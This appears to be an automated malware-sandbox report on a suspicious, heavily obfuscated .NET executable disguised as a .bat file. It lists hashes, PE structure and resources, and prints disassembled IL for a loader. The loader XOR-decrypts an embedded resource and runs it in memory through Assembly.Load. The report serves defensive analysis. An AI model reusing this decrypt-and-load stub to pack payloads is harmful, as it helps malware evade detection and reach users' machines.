Suspicious
Suspect

39aab08ff5e2776a191eac1b8eb7e67b

PE Executable
|
MD5: 39aab08ff5e2776a191eac1b8eb7e67b
|
Size: 6.79 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very high

Hash
Hash Value
MD5
39aab08ff5e2776a191eac1b8eb7e67b
Sha1
dcc76b94fd1b6fa20c35779c8c4b7977ee47b3c7
Sha256
74a8104dc97f3709ba4176bff6f79b57056ed371a57cbd9337ed9fa61bb64ec4
Sha384
5a82c21eafd45fbaceef96d577b147d7c5e5090db278c04be1c41766ef37737459f2036ce89d974d665e234a987dc519
Sha512
37d24c65fb9a3eee2402baecb652cfd271b7db2cfaf7ae4e98a14fb960df2aaec340610093a194278a0d1cc3da52233fccc199202bb94e212107e391d1de3991
SSDeep
98304:vQVXxDv5bYnac6PqTDF8mqsyrWTc6UkAAH9Kumz:YZrYP6Pq3mmYqTcyB
TLSH
346633DA051EAF99F161DB7C06360416A53CFD4ED6A7E25387223F8F91F1D0B86224CA

PeID

Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
File Structure
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_ICON
ID:0002
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
5HsoUGuf85ZMPx9Jbr396xLfn.resources
kbkAkptphS1kubeaM8Blvb1
Informations
Name
Value
Info

PE Detect: PeReader OK (file layout)

Module Name

general (ALT).bat

Full Name

general (ALT).bat

EntryPoint

System.Void 갂갍갡갑갎각갛갬감각갅갅갟갚간갡::Main(System.String[])

Scope Name

general (ALT).bat

Scope Type

ModuleDef

Kind

Windows

Runtime Version

v4.0.30319

Tables Header Version

512

WinMD Version

<null>

Assembly Name

general (ALT)

Assembly Version

0.0.0.0

Assembly Culture

<null>

Has PublicKey

False

PublicKey Token

<null>

Target Framework

<null>

Total Strings

0

Main Method

System.Void 갂갍갡갑갎각갛갬감각갅갅갟갚간갡::Main(System.String[])

Main IL Instruction Count

371

Main IL

call System.Void 갂갍갡갑갎각갛갬감각갅갅갟갚간갡::각감갟갢개갞갤갑갪갍강갞() leave.s IL_000A: ldc.i4.s 36 pop <null> leave.s IL_000A: ldc.i4.s 36 ldc.i4.s 36 newarr System.UInt16 stloc.s V_11 ldloc.s V_11 ldc.i4.0 <null> ldc.i4.s 100 stelem.i2 <null> ldloc.s V_11 ldc.i4.1 <null> ldc.i4.s 81 stelem.i2 <null> ldloc.s V_11 ldc.i4.2 <null> ldc.i4.s 44 stelem.i2 <null> ldloc.s V_11 ldc.i4.3 <null> ldc.i4.s 23 stelem.i2 <null> ldloc.s V_11 ldc.i4.4 <null> ldc.i4.s 11 stelem.i2 <null> ldloc.s V_11 ldc.i4.5 <null> ldc.i4.s 49 stelem.i2 <null> ldloc.s V_11 ldc.i4.6 <null> ldc.i4.s 35 stelem.i2 <null> ldloc.s V_11 ldc.i4.7 <null> ldc.i4.s 17 stelem.i2 <null> ldloc.s V_11 ldc.i4.8 <null> ldc.i4.2 <null> stelem.i2 <null> ldloc.s V_11 ldc.i4.s 9 ldc.i4.s 92 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 10 ldc.i4.s 81 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 11 ldc.i4.s 62 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 12 ldc.i4.s 41 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 13 ldc.i4.s 52 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 14 ldc.i4.s 28 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 15 ldc.i4.s 93 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 16 ldc.i4.s 46 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 17 ldc.i4.6 <null> stelem.i2 <null> ldloc.s V_11 ldc.i4.s 18 ldc.i4.s 22 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 19 ldc.i4.s 87 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 20 ldc.i4.s 93 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 21 ldc.i4.s 82 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 22 ldc.i4.s 28 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 23 ldc.i4.s 40 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 24 ldc.i4.2 <null> stelem.i2 <null> ldloc.s V_11 ldc.i4.s 25 ldc.i4.s 10 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 26 ldc.i4.s 74 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 27 ldc.i4.s 22 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 28 ldc.i4.1 <null> stelem.i2 <null> ldloc.s V_11 ldc.i4.s 29 ldc.i4.s 23 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 30 ldc.i4.s 11 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 31 ldc.i4.s 17 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 32 ldc.i4.s 22 stelem.i2 <null> ldloc.s V_11 ldc.i4.s 33 ldc.i4.7 <null> stelem.i2 <null> ldloc.s V_11 ldc.i4.s 34 ldc.i4.1 <null> stelem.i2 <null> ldloc.s V_11 ldc.i4.s 35 ldc.i4.s 23 stelem.i2 <null> ldloc.s V_11 call System.String 갂갍갡갑갎각갛갬감각갅갅갟갚간갡::갓갥갓갇갓갯갣간갛갉각갫갞(System.UInt16[]) stloc.0 <null> ldc.i4.s 24 newarr System.UInt16 stloc.s V_12 ldloc.s V_12 ldc.i4.0 <null> ldc.i4 212 stelem.i2 <null> ldloc.s V_12 ldc.i4.1 <null> ldc.i4 191 stelem.i2 <null> ldloc.s V_12 ldc.i4.2 <null> ldc.i4 182 stelem.i2 <null> ldloc.s V_12 ldc.i4.3 <null> ldc.i4 191 stelem.i2 <null> ldloc.s V_12 ldc.i4.4 <null> ldc.i4 149 stelem.i2 <null> ldloc.s V_12 ldc.i4.5 <null> ldc.i4 191 stelem.i2 <null> ldloc.s V_12 ldc.i4.6 <null> ldc.i4 164 stelem.i2 <null> ldloc.s V_12 ldc.i4.7 <null> ldc.i4 160 stelem.i2 <null> ldloc.s V_12 ldc.i4.8 <null> ldc.i4 164 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 9 ldc.i4 188 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 10 ldc.i4 135 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 11 ldc.i4 229 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 12 ldc.i4 191 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 13 ldc.i4 161 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 14 ldc.i4 182 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 15 ldc.i4 177 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 16 ldc.i4 181 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 17 ldc.i4 153 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 18 ldc.i4 236 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 19 ldc.i4 150 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 20 ldc.i4 184 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 21 ldc.i4 162 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 22 ldc.i4 182 stelem.i2 <null> ldloc.s V_12 ldc.i4.s 23 ldc.i4 229 stelem.i2 <null> ldloc.s V_12 call System.String 갂갍갡갑갎각갛갬감각갅갅갟갚간갡::갓갥갓갇갓갯갣간갛갉각갫갞(System.UInt16[]) stloc.1 <null> ldc.i4 1436606729 stloc.2 <null> ldc.i4 963000048 stloc.3 <null> ldc.i4 -2059246257 ldc.i4 -1205097187 call System.Int32 갂갍갡갑갎각갛갬감각갅갅갟갚간갡::갉갟각갈갗갣갍값갈갩갦갥갢갃개갌갦갦(System.Int32,System.Int32) stloc.s V_4 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.0 <null> callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) newobj System.Void System.Resources.ResourceReader::.ctor(System.IO.Stream) stloc.s V_5 ldloc.s V_5 ldloc.1 <null> ldloca.s V_6 ldloca.s V_7 callvirt System.Void System.Resources.ResourceReader::GetResourceData(System.String,System.String&,System.Byte[]&) ldc.i4 4507648 conv.i8 <null> conv.ovf.i <null> newarr System.Byte stloc.s V_8 ldc.i4 -434139027 ldc.i4 -613001154 call System.Int32 갂갍갡갑갎각갛갬감각갅갅갟갚간갡::갉갟각갈갗갣갍값갈갩갦갥갢갃개갌갦갦(System.Int32,System.Int32) stloc.s V_9 ldc.i4 314130026 ldc.i4 802223677 call System.Int32 갂갍갡갑갎각갛갬감각갅갅갟갚간갡::갉갟각갈갗갣갍값갈갩갦갥갢갃개갌갦갦(System.Int32,System.Int32) stloc.s V_10 br.s IL_02A6: ldloc.s V_9 ldloc.s V_8 ldloc.s V_9 ldloc.s V_7 ldloc.s V_10 dup <null> ldc.i4.1 <null> add <null> stloc.s V_10 ldelem.u1 <null> ldloc.2 <null> xor <null> conv.u1 <null> stelem.i1 <null> ldloc.3 <null> ldc.i4.1 <null> and <null> ldc.i4.1 <null> bne.un.s IL_028C: ldloc.2 ldloc.s V_10 ldloc.s V_4 add <null> stloc.s V_10 ldloc.2 <null> ldc.i4.5 <null> shr.un <null> ldloc.2 <null> ldc.i4.s 27 shl <null> or <null> ldc.i4.7 <null> mul <null> stloc.2 <null> ldloc.3 <null> ldc.i4.1 <null> shr.un <null> ldloc.3 <null> ldc.i4.s 31 shl <null> or <null> stloc.3 <null> ldloc.s V_9 ldc.i4.1 <null> add <null> stloc.s V_9 ldloc.s V_9 conv.i8 <null> ldc.i4 4507648 conv.i8 <null> blt.s IL_026D: ldloc.s V_8 ldloc.s V_8 call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() ldnull <null> ldc.i4.1 <null> newarr System.String[] stloc.s V_13 ldloc.s V_13 ldc.i4.0 <null> ldc.i4.1 <null> newarr System.String stloc.s V_14 ldloc.s V_14 ldc.i4.0 <null> call System.String System.Environment::get_CommandLine() stelem.ref <null> ldloc.s V_14 ldarg.0 <null> call System.Collections.Generic.IEnumerable`1<System.String> System.Linq.Enumerable::Concat<System.String>(System.Collections.Generic.IEnumerable`1<System.String>,System.Collections.Generic.IEnumerable`1<System.String>) call System.String[] System.Linq.Enumerable::ToArray<System.String>(System.Collections.Generic.IEnumerable`1<System.String>) stelem.ref <null> ldloc.s V_13 callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_02FE: leave.s IL_0303 ldloc.s V_5 brfalse.s IL_02FD: endfinally ldloc.s V_5 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0303: ret pop <null> leave.s IL_0303: ret ret <null>

39aab08ff5e2776a191eac1b8eb7e67b (6.79 MB)
File Structure
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_ICON
ID:0002
ID:0
RT_GROUP_CURSOR4
ID:7F00
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
5HsoUGuf85ZMPx9Jbr396xLfn.resources
kbkAkptphS1kubeaM8Blvb1
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙